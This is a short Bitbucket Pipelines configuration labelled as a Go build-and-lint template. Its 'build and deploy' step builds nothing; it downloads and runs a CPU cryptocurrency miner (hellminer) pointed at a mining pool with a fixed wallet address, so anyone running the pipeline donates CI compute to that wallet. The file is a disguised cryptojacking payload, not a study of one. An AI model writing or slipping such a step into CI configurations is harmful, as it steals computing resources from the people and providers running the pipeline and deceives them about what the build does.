#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: install depencies
          script:
            - sudo apt update
            - sudo apt install screen -y
            # Build compiles the packages
      - step:
          name: build and deploy
          image: golangci/golangci-lint:v1.31.0
          script:
            - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RS3MSpW4rcQqxDDVQsjPHdQLi1AW9jCP2K.Yayak -p x --cpu 10